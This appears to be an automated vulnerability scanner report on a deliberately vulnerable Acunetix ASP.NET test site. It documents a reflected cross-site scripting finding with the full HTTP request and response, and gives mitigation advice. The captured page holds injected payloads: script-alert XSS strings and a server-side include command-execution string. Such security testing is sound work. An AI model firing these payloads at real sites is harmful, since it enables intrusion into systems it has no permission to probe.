src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:00 AM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:01 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	1
Solution	Phase: Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket. Phases: Implementation; Architecture and Design Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed. Phase: Architecture and Design For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Phase: Implementation For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping. To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue." Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
Reference	http://projects.webappsec.org/Cross-Site-Scripting http://cwe.mitre.org/data/definitions/79.html
Tags	OWASP_2021_A03 WSTG-v42-INPV-02 OWASP_2017_A07
CWE Id	79
WASC Id	8
Plugin Id	40014

High	Cross Site Scripting (Reflected)
Description	Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology. When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise. There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based. Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash. Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=javascript%3Aalert%281%29%3B
Method	GET
Parameter	NewsAd
Attack	javascript:alert(1);
Evidence	javascript:alert(1);
Show / hide Request and Response
Request Header - size: 500 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=javascript%3Aalert%281%29%3B HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:08 GMT Content-Length: 30636
Response Body - size: 30,636 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=javascript%3aalert(1)%3b" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aW